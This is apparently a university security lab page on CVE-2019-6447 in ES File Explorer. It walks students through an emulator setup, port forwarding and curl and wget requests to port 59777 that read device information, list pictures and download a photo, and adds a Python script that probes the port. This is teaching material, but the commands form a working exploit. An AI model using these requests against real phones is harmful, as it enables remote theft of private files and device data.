M 207: ES Explorer Command Injection (10 pts + 10 extra)

What You Need for This Project

Background

ES File Explorer is very popular, with over 100 million downloads. However, it exposes your phone to remote control over the network.

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447

It's very easy to see and exploit.

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:

Find your Android Device's IP Address

Launch your Android emulator. In Settings, find your device's IP address, as shown below.

Installing the App

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here.

Drag the APK file onto your Android device and drop it there. Approve the application installation.

Launching the App

Launch the app.

Click Agree, ALLOW, and "START NOW", as shown below.

You see information about your files, as shown below.

Connecting to your Android Device with ADB

Linux

If you are using a Linux machine to run adb, execute these commands, replacing the IP address with the IP address of your Android device:
adb connect 172.16.123.154:5555
adb devices -l
You should see your Android device in the "List of devices attached", as shown below.

Android Studio

If you are using the Android Studio emulator, launch Android Studio and click Tools, "SDK Manager".

Find the Android SDK Location, outlined in green in the image below.

In a Terminal or Command Prompt, execute the commands below, replacing the path in the first command with the correct Android SDK Location on your system.

cd /Users/sambowne/Library/Android/sdk
cd platform-tools
./adb devices -l
You should see your Android device in the "List of devices attached", as shown below.

Viewing the Listening Process

Execute these commands, one at a time:
adb shell
netstat -pant 2>/dev/null | grep LISTEN
exit
You see a process listening on port 59777, as shown below.

Forwarding a Port

To connect to your Android device from your host machine, or a Linux virtual machine, you can use port forwarding.

If you are using a Mac or Linux machine, execute this command:

adb forward tcp:59777 tcp:59777
The command echoes the port number 59777, as shown below.

Windows Users

In a Command Prompt window, in the "platform-tools" directory, execute these commands:
adb kill-server
adb -a nodaemon server start
Leave that Command Prompt window open.

Open a new Command Prompt window. Change directory to the "platform-tools" directory, and execute these commands:

adb forward tcp:59777 tcp:59777
netstat -an -p tcp
You should see the wildcard address 0.0.0.0 (all interfaces) LISTENING on port 59777.

Install Windows Subsystem for Linux and Ubuntu, as explained here.

In a Ubuntu command prompt window, execute this command:

cat /etc/resolv.conf
This shows the IP address of your Windows system.

In the Ubuntu command prompt window, execute this command, replacing 127.0.0.1 with the correct address for your Windows system:

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
If you cannot install Windows Subsystem for Linux, we used a Windows install of curl successfully with this modified command:
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"getDeviceInfo\"}" http://127.0.0.1:59777
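The curl commands above make a single JSON POST to the port the app opens. Here is the same check written as a small Python script, added here as an example and not part of the original project page. It sends the "getDeviceInfo" command from the lab to a host and port you choose and reports whether anything answered, so you can confirm that an emulator or a phone you own is (or, after updating, no longer is) listening. The mock listener in the script is constructed for offline testing only; it echoes the command back and does not reproduce the real app's reply format.

```python
"""Self-check for the ES File Explorer open port (CVE-2019-6447).

probe_es_port() performs the same request as the lab's curl command:
POST {"command":"getDeviceInfo"} with a JSON content type. A reply of
any kind means a service is listening; connection refused or a timeout
means the port is closed.
"""
import json
import socket
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ES_PORT = 59777  # port observed with netstat in the lab


def probe_es_port(host="127.0.0.1", port=ES_PORT, timeout=3.0):
    """Return {'exposed': bool, 'response': ...} or {'exposed': bool, 'error': ...}."""
    body = json.dumps({"command": "getDeviceInfo"}).encode()
    req = urllib.request.Request(
        f"http://{host}:{port}/",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            raw = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as exc:
        # An HTTP error code still proves something is listening on the port.
        return {"exposed": True, "error": f"HTTP {exc.code}"}
    except (urllib.error.URLError, OSError) as exc:
        # Connection refused or timed out: nothing answered on that port.
        return {"exposed": False, "error": str(exc)}
    try:
        return {"exposed": True, "response": json.loads(raw)}
    except ValueError:
        # Not JSON; keep the raw text so the caller can still inspect it.
        return {"exposed": True, "response": raw}


class _MockEsHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the listener, used only for offline testing.

    It echoes the received command; the real app's response format is
    deliberately not reproduced here.
    """

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        cmd = json.loads(self.rfile.read(length) or b"{}").get("command")
        reply = json.dumps({"mock": True, "command": cmd}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):
        pass  # keep the mock quiet


def start_mock_listener():
    """Start the constructed mock on an ephemeral loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), _MockEsHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def free_loopback_port():
    """Bind and release a loopback port so we have one with nothing listening."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # With 'adb forward tcp:59777 tcp:59777' in place, this checks the
    # forwarded emulator port; otherwise it checks the local machine.
    result = probe_es_port()
    state = "EXPOSED" if result["exposed"] else "closed"
    print(f"127.0.0.1:{ES_PORT} is {state}: {result}")
```

Run it with the port forward active and the vulnerable APK installed to see the "getDeviceInfo" reply; rerun it after updating the app to confirm the port is closed. The exposed/closed decision is based only on whether the TCP port answers, which is the same signal the lab's netstat step gives you.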

M 207.1: ftpPort (10 pts)

Execute this command to load information from the ES File Explorer process:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
You see information about your phone, as shown below.

Find the text covered by a green box in the image above. That's the flag.

Extra Credit: Connect to a Camera

Genymotion

If you have a webcam and you are using Genymotion, you can do this.

In Android, on the right side, click the Webcam icon, colored pink in the image below.

Adjust the camera to access your host system's webcam, as shown below.

Android Studio Emulator

Open Android Studio. Close your emulated device.

On the right side, in Device Manager, click the pencil icon to edit your emulated device, outlined in green in the image below.

At the bottom of the next window, click the "Show Advanced Settings" button.

In the next window, set one of the Camera options to Webcam0, outlined in green in the image below.

Now launch Android Studio, launch the emulator, open ES File Explorer, and configure port forwarding again.

Extra Credit: Steal a Photo

On your Android device, open the Camera app and take a photo, as shown below.

Click Finish.

Start your emulator. Launch the Camera app and take a photo.

In a Terminal or Command Prompt, execute this command:

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://127.0.0.1:59777
Find the path to your image in the output, as shown below.

M 207.2: Image Path (10 pts extra)

The flag is covered by a green rectangle in the image below.

Execute this command, replacing the image path with the correct values for your system:
wget http://127.0.0.1:59777//XXXXXXX/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
The file downloads, as shown below.

In the GUI, navigate to the file and double-click it to open it, as shown below.

Testing Security Apps

A student asked what defense will stop this attack. I can't find any app that does it. You could, of course, configure iptables from the command line, but I haven't found any app that works.

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.


Converted to a CTF 2-28-19
Extra credit explanation added 2-21-2020
Updated on 2-10-21
Updated to include Android Studio 9-19-22
Windows WSL instructions added 10-4-22
Flag number updated 6-21-23
Curl for Windows command added 7-15-24